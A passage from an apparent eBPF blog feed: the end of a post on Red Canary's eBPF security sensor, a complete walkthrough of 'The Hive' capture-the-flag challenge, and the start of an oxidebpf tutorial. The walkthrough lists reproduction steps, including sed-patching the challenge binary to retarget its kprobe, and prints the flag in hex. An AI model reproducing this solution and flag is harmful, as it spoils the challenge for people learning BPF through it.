<h3 id="coming-soon-a-gps-for-the-linux-kernel">Coming soon: a GPS for the Linux kernel</h3>
<p>One last thing we need to achieve Run-Most-Places is kernel offsets. To get
some of the information we want out of the kernel, we need to pull that
information out of kernel data structures. Unfortunately, these structures are
not guaranteed to form a stable application binary interface (ABI) and can vary
across kernel versions and distributions. The typical way to solve this is to
build your BPF program on the host you’re targeting and grab information
addresses locally. Unfortunately, that’s not great for ephemeral systems,
short-lived systems, or systems that can’t spare the resources to build and
rebuild sensors. Alternatively, newer kernels support BPF features that take
care of this for the developer, facilitating true Compile-Once, Run-Everywhere
(CO-RE). Unfortunately, for a variety of legitimate reasons, customers aren’t
always running newer kernels.</p>
<p>To tackle this problem, we’re building a system called the Linux Kernel
Component Cloud Builder (LKCCB). LKCCB is an automated system that determines
structure offsets for every kernel version and distribution we want to run our
BPF probes on. These kernel offsets will then be dynamically loaded into the
probes at runtime (using <code class="language-plaintext highlighter-rouge">oxidebpf</code>’s BPF hashmap interface). The probes will
be able to check the loaded offsets and use them to navigate through kernel
data structures appropriate for their host environment, returning exactly the
information we’re looking for.</p>
<p>Think of it as a GPS for the Linux kernel. Our probes will be able to rely on
it to find their way, without needing to memorize the lay of the land (i.e.,
compile on the host). Look out for its open source release in 2022!</p>
<h2 id="what-kind-of-results-should-i-expect">What kind of results should I expect?</h2>
<h3 id="more-system-throughput">More system throughput</h3>
<p>We benchmarked our eBPF probes in <code class="language-plaintext highlighter-rouge">redcanary-ebpf-sensor</code> against <code class="language-plaintext highlighter-rouge">auditd</code> by
loading them with <code class="language-plaintext highlighter-rouge">oxidebpf</code> and comparing execl per second throughput using
<code class="language-plaintext highlighter-rouge">byte-unixbench</code>. The system tested on was a set of four core virtual machines
with 2GB of RAM each, running on a 3950X with 64GB of RAM. The baseline VM had
a throughput of <code class="language-plaintext highlighter-rouge">19421.4 execl/s</code>. With <code class="language-plaintext highlighter-rouge">auditd</code> set to trace <code class="language-plaintext highlighter-rouge">execve</code> and
<code class="language-plaintext highlighter-rouge">execveat</code> events, we measured a throughput of <code class="language-plaintext highlighter-rouge">14187.4 execl/s</code>. The
equivalent set of eBPF probes from our sensor ran with a throughput of <code class="language-plaintext highlighter-rouge">16273.1
execl/s</code>. That’s an approximate 15 percent increase in total system throughput,
just for exec tracing. If we include the full <code class="language-plaintext highlighter-rouge">auditd</code> configuration required for
our Linux sensor, the system throughput drops to <code class="language-plaintext highlighter-rouge">11989 execl/s</code>. The equivalent
set of eBPF probes from our sensor gets us a throughput of <code class="language-plaintext highlighter-rouge">14254 execl/s</code>, an
approximate 19 percent increase in throughput.</p>
<h3 id="collect-information-directly-from-the-kernel">Collect information directly from the kernel</h3>
<p>On some Linux kernel versions, we’ve experienced AuditD reporting incorrect
inode numbers for containerized (i.e., <code class="language-plaintext highlighter-rouge">namespaced</code>) processes. AuditD
notoriously struggles with containers, likely due to the subsystem predating
the popularization of container technology. This requires a userspace
workaround in which we query <code class="language-plaintext highlighter-rouge">procfs</code> for the information we miss. When AuditD
is auditing process forks (i.e., <code class="language-plaintext highlighter-rouge">clone</code>, <code class="language-plaintext highlighter-rouge">clone3</code>, <code class="language-plaintext highlighter-rouge">fork</code>, <code class="language-plaintext highlighter-rouge">vfork</code>) it returns
the child PID as-is from the system call’s return codes. The PID returned is in
the PID namespace of the child, and not the root PID namespace. This makes it
very difficult to use AuditD to keep track of process lineage in containerized
environments. With eBPF, however, we can instrument a point in the kernel
that’s on the return path from a process fork to the child process, and inspect
the child process’s current <code class="language-plaintext highlighter-rouge">task_struct</code> to get the true root namespace PID.</p>
<p>By switching to BPF, we can collect inode information directly from the kernel.
If there are kernel version-specific bugs, we can mitigate them by modifying or
creating a new probe. The checks can happen in kernel space, avoiding the
relatively slow and expensive check against procfs, as well as the inherent
race conditions stemming from gathering data in multiple locations
asynchronously.</p>
<h2 id="how-do-i-get-started">How do I get started?</h2>
<p>You can find all of our eBPF for security tools on GitHub:</p>
<ul>
<li><a href="https://github.com/redcanaryco/redcanary-ebpf-sensor">redcanary-ebpf-sensor</a></li>
<li><a href="https://github.com/redcanaryco/oxidebpf">oxidebpf</a></li>
</ul>
<p>As always, we welcome and encourage you to contribute!</p>Friday OrtizThis post was written for Red Canary and originally appeared on their site here.Learning eBPF through gamification: The Hive CTF Challenge and Walkthrough2021-12-02T00:00:00+00:002021-12-02T00:00:00+00:00https://ortiz.sh/bpf/2021/12/02/THE-HIVE<p><strong>TL;DR:</strong> A (relatively) simple eBPF capture the flag challenge and writeup. The
challenge was made by a colleague on the R&D team and the writeup by one of our
detection engineers. The writeup goes through the whole discovery process and is
a great way to dive into BPF.</p>
<h2 id="welcome-to-the-hive">Welcome to the Hive</h2>
<p>A few weeks ago the R&D team at Red Canary created an internal CTF for anyone
interested to participate in. The Hive (<a href="/download/thehive">download here</a>) is a
challenge created by one of our staff engineers, Dave, who as far as I can tell
does not want to be found on the Internet. The goal of the challenge was to
introduce participants to the workings of BPF, in the hopes that the
discovery/trial-and-error process of solving the challenge would give them a
solid foundation in the technology. It turned out more successful than we hoped!</p>
<p>If you’d like to give the challenge a go, click that download link above and try
to find the flag. You’ll need a relatively up to date Linux machine (we used
Ubuntu 20.04, but it should work on a bunch of distros) with root credentials.</p>
<p>With that out of the way, below is a writeup by Del, one of our detection
engineers. He did a great job documenting his path from knowing nothing about
BPF to knowing something about BPF. If you get stuck, you can follow along
below. Spoilers from here on out!</p>
<p><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></p>
<h2 id="the-writeup">The Writeup</h2>
<p><br />
<br />
<br />
<br />
<br /></p>
<p><strong>Keep scrolling.</strong></p>
<p><br />
<br />
<br />
<br />
<br /></p>
<h3 id="reverse-engineering-thehive-didnt-work-out-for-me"><em>Reverse Engineering <code class="language-plaintext highlighter-rouge">thehive</code> didn’t work out for me.</em></h3>
<p>Using Ghidra to disassemble and decompile <code class="language-plaintext highlighter-rouge">thehive</code> was frustrating. It seems
that Rust, which is what <code class="language-plaintext highlighter-rouge">thehive</code> was written in, does not produce code that
Ghidra deals well with. This was further complicated by the fact the <code class="language-plaintext highlighter-rouge">thehive</code>
uses the <a href="https://github.com/redcanaryco/oxidebpf">Oxidebpf library</a>, which
added another layer that needed to be understood. I had similar experiences
trying to use edb to debug the program while running. The only useful
information I extracted was to determine that the <code class="language-plaintext highlighter-rouge">thehive</code> doesn’t seem to pay
attention, to or collect, user input.</p>
<p>In retrospect, when you think about the nature of BPF, it makes sense that
Ghidra and edb would only have visibility into the ‘loader’ program, and the
guts of this challenge likely reside in the BPF program that it loads into the
kernel.</p>
<h3 id="reverse-engineering-the-bpf-program-didnt-work-out-for-me"><em>Reverse Engineering the BPF program didn’t work out for me.</em></h3>
<p>BPF programs run in a virtual machine hosted in the Linux kernel. They are
loaded by a regular program which uses system calls that will verify and load
the BPF program. BPF programs can read and write in memory data structures
called ‘maps’. These ‘maps’ are the primary mechanism for a BPF program to
communicate results to user space.</p>
<p>Although there are other interesting tools, it seems that two tools are most
often mentioned as useful for investigating BPF programs: bpftool and bpftrace.
The version of the kernel running has an impact on what information is available
to these tools. BPF is an evolving capability and new capabilities are being
added on a regular basis.</p>
<p>Roughly speaking, bpftool is a great tool for collecting data about, and
manipulating, BPF programs after they’ve been loaded into the kernel. The
bpftrace tool is great for loading and running BPF programs in a simple way from
the command line (e.g. running one-line BPF programs).</p>
<p>Using bpftool, I was able to discover the BPF program that was being loaded by
<code class="language-plaintext highlighter-rouge">thehive</code>.</p>
<p>Running the command <code class="language-plaintext highlighter-rouge">sudo bpftool prog list</code> listed info about all the loaded
BPF programs, including:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>57: kprobe tag a01e72fbd4579d51 gpl
loaded_at 2021-11-26T18:23:56-0700 uid 0
xlated 368B jited 203B memlock 4096B map_ids 1
pids thehive(2714)
</code></pre></div></div>
<p>One of the other capabilities of bpftool is to list a BPF program in the native
instruction set used by the BPF virtual-machine. Using this capability, once I
discovered the BPF program loaded by <code class="language-plaintext highlighter-rouge">thehive</code>, I was able to examine the code it
compiled to.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo bpftool prog dump xlated id 57
0: (85) call bpf_get_current_pid_tgid#135712
1: (63) *(u32 *)(r10 -4) = r0
2: (18) r1 = 0x5b5548405d585451
4: (7b) *(u64 *)(r10 -80) = r1
5: (b7) r1 = 0
6: (7b) *(u64 *)(r10 -24) = r1
7: (7b) *(u64 *)(r10 -32) = r1
8: (7b) *(u64 *)(r10 -40) = r1
9: (b7) r1 = 42
10: (7b) *(u64 *)(r10 -48) = r1
11: (18) r1 = 0x313b3d3736242010
13: (7b) *(u64 *)(r10 -56) = r1
14: (18) r1 = 0x2b25381424201734
16: (7b) *(u64 *)(r10 -64) = r1
17: (18) r1 = 0x2f1a222c2d333060
19: (7b) *(u64 *)(r10 -72) = r1
20: (b7) r1 = 102
21: (73) *(u8 *)(r10 -80) = r1
22: (b7) r1 = 1
23: (b7) r2 = 1
24: (bf) r3 = r10
25: (07) r3 += -80
26: (0f) r3 += r2
27: (71) r4 = *(u8 *)(r3 +0)
28: (bf) r5 = r1
29: (07) r5 += 55
30: (af) r4 ^= r5
31: (73) *(u8 *)(r3 +0) = r4
32: (07) r1 += 1
33: (07) r2 += 1
34: (15) if r2 == 0x40 goto pc+1
35: (05) goto pc-12
36: (bf) r2 = r10
37: (07) r2 += -4
38: (bf) r3 = r10
39: (07) r3 += -80
40: (18) r1 = map[id:1]
42: (b7) r4 = 0
43: (85) call htab_map_update_elem#160336
44: (b7) r0 = 0
45: (95) exit
</code></pre></div></div>
<p>I’ll spare you the details, but I spent a lot of time trying to reverse engineer
this program. Basically: lines 0 - 23 load seemingly gibberish values into
memory, lines 24 - 34 loop through those values in memory, XOR’ng each value
with a different value. Finally, the rest of the program appears to load the
resulting values into a map. It seems clear that the loop XOR’ng the values is
decoding them, with the result then being loaded into a map.</p>
<p>Sadly, I was unable to decode the strings using this code. I’m sure it’s
possible, but my binary foo wasn’t up to the job. Once I started asking myself
if endianness mattered, and did I really understand how bytes were being stored
by the vm, I threw up my hands and decided there had to be an easier way.</p>
<p>I did however, come to understand what this program does, and that it writes a
value to a map. This value is almost certainly the flag!</p>
<h3 id="letting-the-bpf-program-do-all-the-work-did-work-out-eventually"><em>Letting the BPF program do all the work did work out (eventually)</em></h3>
<p>One of the capabilities of bpftool is the ability to dump the contents of a map.
Unfortunately, when I ran <code class="language-plaintext highlighter-rouge">thehive</code>, although it loaded the BPF program into the
kernel, it appears that the BPF program never runs. I say this because the
associated map never collects a value:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo bpftool map dump id 1
Found 0 elements
</code></pre></div></div>
<p>Looking at the data from <code class="language-plaintext highlighter-rouge">bpftool prog list</code> for the BPF program, we know that the
BPF program is attached to a specific kernel function via the kprobe capability
in BPF. This means that when that particular kernel function executes, the BPF
program attached to it will also be executed. So, it appears that when the
correct kernel function gets invoked, this BPF program will run (and write the
flag to the map associated with it).</p>
<p>So which system function is this BPF program attached to? There are literally
thousands of possibilities:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo bpftrace -l | grep kprobe: | wc
51256 51256 1416114
</code></pre></div></div>
<p>(BTW, one of the complications with kprobes is that the set of kernel functions
which are available, varies with the kernel. Since at this point I expected the
BPF program to be attached to something that is often used (such as execve), I
started to worry that maybe I was running a kernel that didn’t support the
kprobe that thehive tried to attach the BPF program to. This led to building
several VMs, each running the most current version of the kernel I could find.
All to no avail.)</p>
<p>Luckily, I eventually discovered that one of the other capabilities of bpftool
is to list any installed kprobes.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo bpftool perf list
pid 2714 fd 6: prog_id 57 kprobe func do_mount offset 0
</code></pre></div></div>
<p>Eureka! This reveals that the BPF has been assigned to the <code class="language-plaintext highlighter-rouge">do_mount</code> kernel
function. So, if I can arrange for that kernel function to be invoked, the BPF
program should execute and write the flag to the map. Even better, this
function sounds like it must be available everywhere.</p>
<p>Well, much hilarity ensued as I tried every way I could think of to use the
mount command to invoke the <code class="language-plaintext highlighter-rouge">do_mount</code> system call. The bottom line is that I
mounted ISO’s, devices, anything I could think of, all to no effect.</p>
<p>As a sanity check, I ran the following bpftrace program to monitor for <code class="language-plaintext highlighter-rouge">do_mount</code>
invocations:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo bpftrace -e 'kprobe:do_mount { printf("mount by %d\n", tid); }'
</code></pre></div></div>
<p>which confirmed that I was not successfully triggering the <code class="language-plaintext highlighter-rouge">do_mount</code> kernel
function.</p>
<p>Searching the list of kprobes (<code class="language-plaintext highlighter-rouge">bpftrace -l</code>) shows that <code class="language-plaintext highlighter-rouge">do_mount</code> is a legitimate
kprobe target, but I just wasn’t able to trigger it on several different kernels
that I tried. Researching <code class="language-plaintext highlighter-rouge">do_mount</code> didn’t provide a definitive answer, although
there was some suggestion that it’s only used during boot.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Author's note: what follows should not be necessary to get the solution. In our
own testing we were successful with running the standard mount command. The
command doesn't even need to succeed, so long as do_mount is invoked at some
point. But, honestly, Del's solution here is pretty darn clever.
</code></pre></div></div>
<h3 id="so-here-i-resorted-to-using-a-blunt-instrument"><em>So here I resorted to using a blunt instrument</em></h3>
<p>Finally, in desperation, I decided to try patching the program to change which
system function this BPF program was being associated with. A quick search
using the strings program against the binary suggested that the name of the
function was in fact being used to load the BPF program.</p>
<p>Using the ghex binary file editor I manually changed the instances of <code class="language-plaintext highlighter-rouge">do_mount</code>
to <code class="language-plaintext highlighter-rouge">execve</code>, since I knew that the <code class="language-plaintext highlighter-rouge">execve</code> kernel function was being invoked often.
I null terminated this string, since the <code class="language-plaintext highlighter-rouge">do_mount</code> strings appeared to be null
terminated (in Rust, strings aren’t necessarily null terminated). However the
patched binary panicked when I tried it.</p>
<p>On the theory that the strings were not null terminated, I searched the list of
kprobe names for one the same length as <code class="language-plaintext highlighter-rouge">do_mount</code>, and decided to try replacing
<code class="language-plaintext highlighter-rouge">do_mount</code> with <code class="language-plaintext highlighter-rouge">do_rmdir</code>.</p>
<p>With this change, the patched binary ran successfully. After starting my hacked
verson of thehive as root, I executed the commands:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ mkdir test
$ rmdir test
$ sudo bpftool prog list (to obtain the id of the map)
$ sudo bpftool map dump id 7
key:
ad 1a 00 00
value:
66 6c 61 67 7b 74 68 65 5f 70 72 6f 6f 66 5f 69
73 5f 69 6e 5f 74 68 65 5f 70 75 64 64 69 6e 67
7d 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66
67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76
Found 1 element
</code></pre></div></div>
<p>Copying the hex strings above into CyberChef, and then running the ‘From Hex’
recipe with ‘Delimiter’ set to Auto, revealed the flag!</p>
<p>For me, this was a deep immersion in the modern BPF, something I had only
fleetingly played with before. Overall it was a complete blast, and I’m
grateful for the opportunity to play with it. I’d certainly appreciate any
corrections or suggestions on better ways to approach this challenge.</p>
<h3 id="here-are-some-references">Here are Some References:</h3>
<ul>
<li><a href="https://qmonnet.github.io/whirl-offload/2021/09/23/bpftool-features-thread/">https://qmonnet.github.io/whirl-offload/2021/09/23/bpftool-features-thread/</a></li>
<li><a href="https://github.com/iovisor/bpftrace/blob/master/docs/reference_guide.md#bpftrace-reference-guide">https://github.com/iovisor/bpftrace/blob/master/docs/reference_guide.md#bpftrace-reference-guide</a></li>
<li><a href="https://www.kernel.org/doc/Documentation/kprobes.txt">https://www.kernel.org/doc/Documentation/kprobes.txt</a></li>
<li><a href="https://ebpf.io/">https://ebpf.io/</a></li>
<li><a href="https://www.oreilly.com/library/view/linux-observability-with/9781492050193/">https://www.oreilly.com/library/view/linux-observability-with/9781492050193/</a></li>
</ul>
<h3 id="heres-how-to-reproduce-the-solution">Here’s How to Reproduce the Solution</h3>
<ol>
<li><code class="language-plaintext highlighter-rouge">sed s/do_mount/do_rmdir/g thehive > thehive-hacked</code></li>
<li><code class="language-plaintext highlighter-rouge">chmod 755 thehive-hacked</code></li>
<li><code class="language-plaintext highlighter-rouge">sudo ./thehive-hacked</code></li>
<li>open another terminal tab, do the rest in that tab</li>
<li><code class="language-plaintext highlighter-rouge">mkdir test</code></li>
<li><code class="language-plaintext highlighter-rouge">rmdir test</code></li>
<li><code class="language-plaintext highlighter-rouge">sudo bpftool prog list</code></li>
<li>near end, find ‘kprobe’ with ‘loaded_at’ or ‘pids’ matching step 3, observe ‘map_ids’</li>
<li><code class="language-plaintext highlighter-rouge">sudo bpftool map dump id <id# from 'maps_ids' in step 8></code></li>
<li>copy & paste ‘value:’ into a CyberChef window</li>
<li>use the ‘From Hex’ recipe with ‘Delimiter’ set to Auto</li>
</ol>
<h3 id="control-flow-graph">Control Flow Graph</h3>
<p>Finally, in case it’s of interest, here’s a flow chart of the BPF program,
courtesy of <code class="language-plaintext highlighter-rouge">bpftool prog dump xlated <id> visual</code>:</p>
<p><img src="/images/thehive.png" alt="control flow graph of the hive's BPF program" /></p>Friday OrtizTL;DR: A (relatively) simple eBPF capture the flag challenge and writeup. The challenge was made by a colleague on the R&D team and the writeup by one of our detection engineers. The writeup goes through the whole discovery process and is a great way to dive into BPF.Introducing oxidebpf: an open source Linux tool for Rust and eBPF developers2021-11-01T05:00:00+00:002021-11-01T05:00:00+00:00https://ortiz.sh/ebpf/2021/11/01/INTRODUCING-OXIDEBPF<p><strong>This post was written for Red Canary and originally appeared on their site
<a href="https://redcanary.com/blog/oxidebpf/">here</a>.</strong></p>
<p><strong>Author’s Note: This was originally written for an old version of <code class="language-plaintext highlighter-rouge">oxidebpf</code>
(0.1.0, the initial release).</strong></p>
<p>BPF is a <a href="https://redcanary.com/blog/linux-101/">Linux kernel</a> subsystem that
allows a user to run a limited set of instructions on a virtual machine running
in the kernel. It is divided between classic BPF (cBPF) and extended BPF (eBPF,
or simply BPF). The older cBPF was limited to observing packet information,
while the newer eBPF is much more powerful, allowing a user to do things such
as modify packets, change syscall arguments, modify userspace applications, and
more.</p>
<h2 id="why-did-we-create-oxidebpf">Why did we create <code class="language-plaintext highlighter-rouge">oxidebpf</code>?</h2>
<p>We wanted to create a fully BSD-3 licensed library to allow users maximum
flexibility in how they manage BPF programs. There are already a number of
fantastic libraries for interfacing with eBPF. However, none of them met our
exact use case, and licensing was a major hurdle.</p>
<p>eBPF has a wide range of capabilities that can be leveraged for security
applications, but it has evolved significantly over a range of major kernel
versions. This has made it difficult to release commercial products wherein a
customer isn’t responsible for building and deploying the eBPF component
themselves. Customers don’t want to do that, nor do they want to be on the
bleeding edge of the Linux kernel (perhaps they rely on a driver that hasn’t
been updated yet, or they simply use whatever kernel their distro of choice
provides and don’t actively think about it).</p>
<p>One of the major features we implemented in oxidebpf is the ability to compose
arbitrary eBPF programs independently from the file they’re compiled in. This
leaves behind the all-or-nothing approach of many other libraries and allows
the consuming application more flexibility to define what an eBPF program
actually is: a series of functions and maps, independent of the container
format they are stored in.</p>
<p>We want oxidebpf to be as easy as possible for the end user. You import the
library, give it a built eBPF program, tell it what you want to load and how,
and you’re done.</p>
<h2 id="how-do-i-get-started">How do I get started?</h2>
<p><strong>Author’s note: This should work on 0.1, but the interface is somewhat
different from 0.2 onwards. See the talk linked at the beginning of this
post.</strong></p>
<p>oxidebpf assumes you already have a compiled eBPF program ready to load. We
have a minimal example of a eBPF program included under
<a href="https://github.com/redcanaryco/oxidebpf/blob/main/test/test_program.c">test/test_program.c</a>.
We’ve also included a
<a href="https://github.com/redcanaryco/oxidebpf/blob/main/test/Makefile">Makefile</a>,
<a href="https://github.com/redcanaryco/oxidebpf/blob/main/test/Dockerfile">Dockerfile</a>,
and
<a href="https://github.com/redcanaryco/oxidebpf/blob/main/test/docker-compose.yml">YAML</a>
file for easily setting up an environment to build eBPF programs.</p>
<p>Please note that this example is marked with a <code class="language-plaintext highlighter-rouge">Proprietary</code> license, which means
it can’t do anything useful. All the helper functions and exported symbols
you’ll want to use to do meaningful work are exported as GPL-only. You’ll want
to use something GPL-compatible in practice. Our approach has been to release a
generic BPF sensor program under GPL-2.0 that our customers can selectively
load into our proprietary software. Because oxidebpf is BSD-3-licensed, it
gives you the freedom to adopt this approach and develop a fully GPL-compatible
licensed tool (or use any other licensing you choose, so long as the BPF
licensing is respected).</p>
<p>We will assume your project has the following structure, where the contents of
the <code class="language-plaintext highlighter-rouge">bpf/</code> directory are copied from the <code class="language-plaintext highlighter-rouge">test/</code> directory of oxidebpf:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.
├── Cargo.toml
├── bpf
│ ├── Dockerfile
│ ├── Makefile
│ ├── docker-compose.yml
│ └── test_program.c
└── src
└── main.rs
</code></pre></div></div>
<p>Let’s say we want to trace the process identifier (PID) of any process that
receives a TCP message from <code class="language-plaintext highlighter-rouge">tcp_recvmsg</code>. We’ll want to make some modifications
to <code class="language-plaintext highlighter-rouge">test_program.c</code>.</p>
<p>First, we’ll remove all the unnecessary maps and probes and add prototypes for
the functions and structure we actually use.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <linux/kconfig.h>
#include <linux/bpf.h>
</span>
<span class="k">static</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span> <span class="p">(</span><span class="o">*</span><span class="n">bpf_get_current_pid_tgid</span><span class="p">)(</span><span class="kt">void</span><span class="p">)</span> <span class="o">=</span>
<span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mi">14</span><span class="p">;</span>
<span class="k">static</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span> <span class="p">(</span><span class="o">*</span><span class="n">bpf_get_current_uid_gid</span><span class="p">)(</span><span class="kt">void</span><span class="p">)</span> <span class="o">=</span>
<span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mi">15</span><span class="p">;</span>
<span class="k">static</span> <span class="kt">int</span> <span class="p">(</span><span class="o">*</span><span class="n">bpf_perf_event_output</span><span class="p">)(</span><span class="kt">void</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">map</span><span class="p">,</span> <span class="kt">int</span> <span class="n">index</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span> <span class="kt">int</span> <span class="n">size</span><span class="p">)</span> <span class="o">=</span>
<span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mi">25</span><span class="p">;</span>
<span class="k">static</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span> <span class="p">(</span><span class="o">*</span><span class="n">bpf_get_smp_processor_id</span><span class="p">)(</span><span class="kt">void</span><span class="p">)</span> <span class="o">=</span>
<span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mi">8</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">bpf_map_def</span> <span class="p">{</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">type</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">key_size</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">value_size</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">max_entries</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">map_flags</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>Then, we’ll add a new <code class="language-plaintext highlighter-rouge">BPF_MAP_TYPE_PERF_EVENT_ARRAY</code> for communicating PIDs
back to our program.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">bpf_map_def</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">section</span><span class="p">(</span><span class="s">"maps/pid_events"</span><span class="p">),</span> <span class="n">used</span><span class="p">))</span> <span class="n">pid_events</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">.</span><span class="n">type</span> <span class="o">=</span> <span class="n">BPF_MAP_TYPE_PERF_EVENT_ARRAY</span><span class="p">,</span>
<span class="p">.</span><span class="n">key_size</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">u32</span><span class="p">),</span>
<span class="p">.</span><span class="n">value_size</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">u32</span><span class="p">),</span>
<span class="p">.</span><span class="n">max_entries</span> <span class="o">=</span> <span class="mi">1024</span><span class="p">,</span>
<span class="p">.</span><span class="n">map_flags</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
<p>Then we’ll want to create a struct for passing the PID back to our program
through the <code class="language-plaintext highlighter-rouge">perf</code> map.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">typedef</span> <span class="k">struct</span> <span class="p">{</span>
<span class="n">u32</span> <span class="n">pid</span><span class="p">;</span>
<span class="n">u32</span> <span class="n">tgid</span><span class="p">;</span>
<span class="n">u32</span> <span class="n">uid</span><span class="p">;</span>
<span class="n">u32</span> <span class="n">gid</span><span class="p">;</span>
<span class="p">}</span> <span class="n">pid_tgid_msg</span><span class="p">;</span>
</code></pre></div></div>
<p>Now we can add a new program that will get the current PID and send it through
the <code class="language-plaintext highlighter-rouge">perf</code> map.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">__attribute__</span><span class="p">((</span><span class="n">section</span><span class="p">(</span><span class="s">"kprobe/trace_pid_event"</span><span class="p">),</span> <span class="n">used</span><span class="p">))</span> <span class="kt">int</span> <span class="nf">test_program</span><span class="p">(</span><span class="k">struct</span> <span class="n">pt_regs</span> <span class="o">*</span><span class="n">regs</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">u32</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">bpf_get_current_pid_tgid</span><span class="p">();</span>
<span class="n">u32</span> <span class="n">tgid</span> <span class="o">=</span> <span class="n">bpf_get_current_pid_tgid</span><span class="p">()</span> <span class="o">>></span> <span class="mi">32</span><span class="p">;</span>
<span class="n">u32</span> <span class="n">uid</span> <span class="o">=</span> <span class="n">bpf_get_current_uid_gid</span><span class="p">();</span>
<span class="n">u32</span> <span class="n">gid</span> <span class="o">=</span> <span class="n">bpf_get_current_uid_gid</span><span class="p">()</span> <span class="o">>></span> <span class="mi">32</span><span class="p">;</span>
<span class="n">pid_tgid_msg</span> <span class="n">msg</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">.</span><span class="n">pid</span> <span class="o">=</span> <span class="n">pid</span><span class="p">,</span>
<span class="p">.</span><span class="n">tgid</span> <span class="o">=</span> <span class="n">tgid</span><span class="p">,</span>
<span class="p">.</span><span class="n">uid</span> <span class="o">=</span> <span class="n">uid</span><span class="p">,</span>
<span class="p">.</span><span class="n">gid</span> <span class="o">=</span> <span class="n">gid</span><span class="p">,</span>
<span class="p">};</span>
<span class="n">bpf_perf_event_output</span><span class="p">(</span><span class="n">regs</span><span class="p">,</span> <span class="o">&</span><span class="n">pid_events</span><span class="p">,</span> <span class="n">bpf_get_smp_processor_id</span><span class="p">(),</span>
<span class="o">&</span><span class="n">msg</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">msg</span><span class="p">));</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Finally, we change the license of the program to <code class="language-plaintext highlighter-rouge">GPL</code> so we can do useful work
(the verifier will reject calling <code class="language-plaintext highlighter-rouge">bpf_perf_event_open()</code> from a proprietary
program).</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">char</span> <span class="n">_license</span><span class="p">[]</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">section</span><span class="p">(</span><span class="s">"license"</span><span class="p">),</span> <span class="n">used</span><span class="p">))</span> <span class="o">=</span> <span class="s">"GPL"</span><span class="p">;</span>
</code></pre></div></div>
<p>We can build this with <code class="language-plaintext highlighter-rouge">docker compose run --rm test-builder</code>, giving us a
<code class="language-plaintext highlighter-rouge">test_program_x86_64</code>.</p>
<p>Our project directory now looks like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.
├── Cargo.toml
├── bpf
│ ├── Dockerfile
│ ├── Makefile
│ ├── docker-compose.yml
│ ├── test_program.c
│ └── test_program_x86_64
└── src
└── main.rs
</code></pre></div></div>
<p>Now we can start writing our Rust code. First, we need to add some dependencies
to our <code class="language-plaintext highlighter-rouge">Cargo.toml</code>.</p>
<div class="language-toml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="py">oxidebpf</span> <span class="p">=</span> <span class="s">"0.1.0"</span>
<span class="py">users</span> <span class="p">=</span> <span class="s">"0.11.0"</span>
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">users</code> library will help us find a username from <code class="language-plaintext highlighter-rouge">uid</code> more easily. Now we
can import the libraries into our <code class="language-plaintext highlighter-rouge">main.rs</code>.</p>
